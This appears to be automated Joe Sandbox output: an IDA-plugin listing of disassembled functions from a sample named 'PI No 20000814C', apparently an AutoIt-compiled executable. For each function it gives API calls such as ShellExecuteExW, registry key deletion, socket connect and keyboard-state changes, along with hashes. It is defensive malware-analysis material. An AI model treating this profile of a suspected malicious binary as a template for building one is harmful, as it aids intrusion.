                                      • Part of subcall function 00F09997: __itow.LIBCMT ref: 00F099C2
                                      • Part of subcall function 00F09997: __swprintf.LIBCMT ref: 00F09A0C
                                    • CoInitialize.OLE32 ref: 00F78718
                                    • VariantInit.OLEAUT32(?), ref: 00F78890
                                    • VariantClear.OLEAUT32(?), ref: 00F788F1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInitInitialize__itow__swprintf
                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                    • API String ID: 4106155388-1287834457
                                    • Opcode ID: dd9d915aafc8b13d64d2ebc7dcfceedc97572ecbe269e6c0d055743f8a17583e
                                    • Instruction ID: afb56163c5dd8080d1b0028d139a5ba4d46d7f7da44c8e512d835e6ec2bc6300
                                    • Opcode Fuzzy Hash: dd9d915aafc8b13d64d2ebc7dcfceedc97572ecbe269e6c0d055743f8a17583e
                                    • Instruction Fuzzy Hash: 7261E4716483019FC710DF24C848B6ABBE4AF44754F10881EF98A9B291DB74ED4AEB93
                                    Function 00F7F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00F7F75C
                                    • _memset.LIBCMT ref: 00F7F825
                                    • ShellExecuteExW.SHELL32(?), ref: 00F7F86A
                                      • Part of subcall function 00F09997: __itow.LIBCMT ref: 00F099C2
                                      • Part of subcall function 00F09997: __swprintf.LIBCMT ref: 00F09A0C
                                      • Part of subcall function 00F1FEC6: _wcscpy.LIBCMT ref: 00F1FEE9
                                    • GetProcessId.KERNEL32(00000000), ref: 00F7F8E1
                                    • CloseHandle.KERNEL32(00000000), ref: 00F7F910
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                    • String ID: @
                                    • API String ID: 3522835683-2766056989
                                    • Opcode ID: 29e30f56802dbbfebc0a4dc69db3713ff42189cb1f9bf9a50fd71493ec72f8f7
                                    • Instruction ID: bd6f914b79f173e24f9198bc8730b773a37a3c210163bdb2b6e72b5c9bdff888
                                    • Opcode Fuzzy Hash: 29e30f56802dbbfebc0a4dc69db3713ff42189cb1f9bf9a50fd71493ec72f8f7
                                    • Instruction Fuzzy Hash: 40618E75E00619DFCF14DF94C8809AEBBF5FF48310B14846AE84AAB391DB34AD45EB91
                                    Function 00F6145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetParent.USER32(?), ref: 00F6149C
                                    • GetKeyboardState.USER32(?), ref: 00F614B1
                                    • SetKeyboardState.USER32(?), ref: 00F61512
                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00F61540
                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00F6155F
                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00F615A5
                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F615C8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessagePost$KeyboardState$Parent
                                    • String ID:
                                    • API String ID: 87235514-0
                                    • Opcode ID: 6d334a990323f1257267c8efeb600213589e5e844033314c3dbbb8f180879ecc
                                    • Instruction ID: 02e7600ca64089052156b42ab2784914ce82ba3f2686415b2ed4b107befa8f54
                                    • Opcode Fuzzy Hash: 6d334a990323f1257267c8efeb600213589e5e844033314c3dbbb8f180879ecc
                                    • Instruction Fuzzy Hash: 8A51E3A0E047D53EFB328634CC45BBABEA97B46324F0C8589E1D6468D2C799DC94F750
                                    Function 00F61276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetParent.USER32(00000000), ref: 00F612B5
                                    • GetKeyboardState.USER32(?), ref: 00F612CA
                                    • SetKeyboardState.USER32(?), ref: 00F6132B
                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F61357
                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F61374
                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F613B8
                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F613D9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessagePost$KeyboardState$Parent
                                    • String ID:
                                    • API String ID: 87235514-0
                                    • Opcode ID: 511195e93997e9479921e7c1f70c165200091933b66633daf5f69c6e79902c17
                                    • Instruction ID: 477fdc9e8f1a6ca4aa7ff932ac1adf06a93c046fedf1048c14ade0ad7a3d2642
                                    • Opcode Fuzzy Hash: 511195e93997e9479921e7c1f70c165200091933b66633daf5f69c6e79902c17
                                    • Instruction Fuzzy Hash: 5851F6A0D047D53DFB3287248C56BBA7FA9BB06310F0C8689E1D5869C2D795AC98F750
                                    Function 00F6589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _wcsncpy$LocalTime
                                    • String ID:
                                    • API String ID: 2945705084-0
                                    • Opcode ID: 49e12d2f186eb2c8e877ebd086fe32b501f2b7e3b415995f7d365b708eb036c8
                                    • Instruction ID: 78865d8bb7fab717c9384d2eb0822ed4ae32e00e74828bf5f2691d55842c4630
                                    • Opcode Fuzzy Hash: 49e12d2f186eb2c8e877ebd086fe32b501f2b7e3b415995f7d365b708eb036c8
                                    • Instruction Fuzzy Hash: 8F41B2A5C20528B6CF50EBF49C869CFB3A8AF05710F508856F518E3121E63CE754E7A5
                                    Function 00F638AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F648AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F638D3,?), ref: 00F648C7
                                      • Part of subcall function 00F648AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F638D3,?), ref: 00F648E0
                                    • lstrcmpiW.KERNEL32(?,?), ref: 00F638F3
                                    • _wcscmp.LIBCMT ref: 00F6390F
                                    • MoveFileW.KERNEL32(?,?), ref: 00F63927
                                    • _wcscat.LIBCMT ref: 00F6396F
                                    • SHFileOperationW.SHELL32(?), ref: 00F639DB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                    • String ID: \*.*
                                    • API String ID: 1377345388-1173974218
                                    • Opcode ID: a1f2d87a6c6d72b64a4c02c7ae01bc6ff21a4adb64a6076accb38c622cf2e185
                                    • Instruction ID: e9b3d21d7225c5e356f949e3cc0ddd099686deda967146c13ffba31af0f3815d
                                    • Opcode Fuzzy Hash: a1f2d87a6c6d72b64a4c02c7ae01bc6ff21a4adb64a6076accb38c622cf2e185
                                    • Instruction Fuzzy Hash: 734191B250D3449ED751EF64D881AEFB7E8AF88350F00092EB489C3151EA79D688EB52
                                    Function 00F87500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 00F87519
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F875C0
                                    • IsMenu.USER32(?), ref: 00F875D8
                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F87620
                                    • DrawMenuBar.USER32 ref: 00F87633
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                    • String ID: 0
                                    • API String ID: 3866635326-4108050209
                                    • Opcode ID: e3e4d0c78bde6782005ccd6de852f17e15870114c0e984e0ca1d1bcad04ca439
                                    • Instruction ID: 3b158dad2cdea34ee08bef03b2da5e8f443d38ef6049021cd8116c11c203cad5
                                    • Opcode Fuzzy Hash: e3e4d0c78bde6782005ccd6de852f17e15870114c0e984e0ca1d1bcad04ca439
                                    • Instruction Fuzzy Hash: 6B410875A08709AFDB10EF54D984EEABBB8FF04324F148129E9559B290D730ED54EFA0
                                    Function 00F8122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00F8125C
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F81286
                                    • FreeLibrary.KERNEL32(00000000), ref: 00F8133D
                                      • Part of subcall function 00F8122D: RegCloseKey.ADVAPI32(?), ref: 00F812A3
                                      • Part of subcall function 00F8122D: FreeLibrary.KERNEL32(?), ref: 00F812F5
                                      • Part of subcall function 00F8122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F81318
                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F812E0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                    • String ID:
                                    • API String ID: 395352322-0
                                    • Opcode ID: 637f25b946fa58255a0a225dbf20dc87623b7ca522c77082cb066c364ef4cc79
                                    • Instruction ID: 74d4fe07117a8e25be695d8f617b9659565fe395101185c996d1421aabbc75b3
                                    • Opcode Fuzzy Hash: 637f25b946fa58255a0a225dbf20dc87623b7ca522c77082cb066c364ef4cc79
                                    • Instruction Fuzzy Hash: F8310CB1D0111DBFDB15AB90DC89EFEB7BCFB08310F100269E505E2151DA749E8AABA0
                                    Function 00F8653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00F8655B
                                    • GetWindowLongW.USER32(01983AE0,000000F0), ref: 00F8658E
                                    • GetWindowLongW.USER32(01983AE0,000000F0), ref: 00F865C3
                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00F865F5
                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00F8661F
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00F86630
                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00F8664A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: LongWindow$MessageSend
                                    • String ID:
                                    • API String ID: 2178440468-0
                                    • Opcode ID: e972ff1516be53941facf45afd0bf3b704a1f2bf3aa662c211e1ec257bce209c
                                    • Instruction ID: 8f650f6e27974cbd2cdae9e15caa77c7c6f236a8a136dda3dc888b334ca0a6a0
                                    • Opcode Fuzzy Hash: e972ff1516be53941facf45afd0bf3b704a1f2bf3aa662c211e1ec257bce209c
                                    • Instruction Fuzzy Hash: 4B31F271A04258AFDB209F18DC86FA53BE1FF4A724F1902A8F511CF2B5DB61A844EB51
                                    Function 00F76486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F780A0: inet_addr.WS2_32(00000000), ref: 00F780CB
                                    • socket.WS2_32(00000002,00000001,00000006), ref: 00F764D9
                                    • WSAGetLastError.WS2_32(00000000), ref: 00F764E8
                                    • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00F76521
                                    • connect.WSOCK32(00000000,?,00000010), ref: 00F7652A
                                    • WSAGetLastError.WS2_32 ref: 00F76534
                                    • closesocket.WS2_32(00000000), ref: 00F7655D
                                    • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00F76576
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                    • String ID:
                                    • API String ID: 910771015-0
                                    • Opcode ID: f96bc77f7a22af45556041a7bed4d5b9506f7ce0671aa473b0526c44f2696230
                                    • Instruction ID: 4f7a5fc39afe1324342ae2e23c041dc46aef20b89eb2b7b2cf0c292c966c663c
                                    • Opcode Fuzzy Hash: f96bc77f7a22af45556041a7bed4d5b9506f7ce0671aa473b0526c44f2696230
                                    • Instruction Fuzzy Hash: B931A131600518AFDF10AF24CC85BBE7BA9EB44724F04802AFD09D7291DB74AD09FB62
                                    Function 00F5FB6E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                    • API String ID: 1038674560-2734436370
                                    • Opcode ID: c7f8e593f307de0fa455523e986f8946a9df97055fb6dcb1aae5269e646d66ba
                                    • Instruction ID: 9c47452b931ad899715137c208c05fb2dac89b8c5d0186fdfada5613de097c6e
                                    • Opcode Fuzzy Hash: c7f8e593f307de0fa455523e986f8946a9df97055fb6dcb1aae5269e646d66ba
                                    • Instruction Fuzzy Hash: 96217C72900266B6D330F630ED12FA77398EF51311F144075FE8687181EB58AE8EF295
                                    Function 00F8783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F01D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F01D73
                                      • Part of subcall function 00F01D35: GetStockObject.GDI32(00000011), ref: 00F01D87
                                      • Part of subcall function 00F01D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F01D91
                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F878A1
                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F878AE
                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F878B9
                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F878C8
                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F878D4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$CreateObjectStockWindow
                                    • String ID: Msctls_Progress32
                                    • API String ID: 1025951953-3636473452
                                    • Opcode ID: f1f8e3d6894d821c778e30b4507d89812b04d1472626b42859a6853a0dd22667
                                    • Instruction ID: 1b8fd4ae6f98c65d1cf09ebd443f41e76a9b6927ebeabbd4ca2c1b8f889b05fd
                                    • Opcode Fuzzy Hash: f1f8e3d6894d821c778e30b4507d89812b04d1472626b42859a6853a0dd22667
                                    • Instruction Fuzzy Hash: 091163B2554219BFEF159F60CC85EE77F5DEF08768F114115B604A6090CB719C21EBA4
                                    Function 00F241C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00F241E3
                                    • GetProcAddress.KERNEL32(00000000), ref: 00F241EA
                                    • RtlEncodePointer.NTDLL(00000000), ref: 00F241F6
                                    • RtlDecodePointer.NTDLL(00000001), ref: 00F24213
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                    • String ID: RoInitialize$combase.dll
                                    • API String ID: 3489934621-340411864
                                    • Opcode ID: 4b197ce9d667cbadab0bf802673df7bf35dd6812f3ca90ed536ccb1cbee26c45
                                    • Instruction ID: da11da36ae4e369ace1232508bbd93d266e13ccc0baa93c4640c26c077434959
                                    • Opcode Fuzzy Hash: 4b197ce9d667cbadab0bf802673df7bf35dd6812f3ca90ed536ccb1cbee26c45
                                    • Instruction Fuzzy Hash: 17E01AB0A90308AFEF225BB1ED1EF643AA4B721B02F144424B451D60E0DBB56099BF00
                                    Function 00F2429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00F241B8), ref: 00F242B8
                                    • GetProcAddress.KERNEL32(00000000), ref: 00F242BF
                                    • RtlEncodePointer.NTDLL(00000000), ref: 00F242CA
                                    • RtlDecodePointer.NTDLL(00F241B8), ref: 00F242E5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
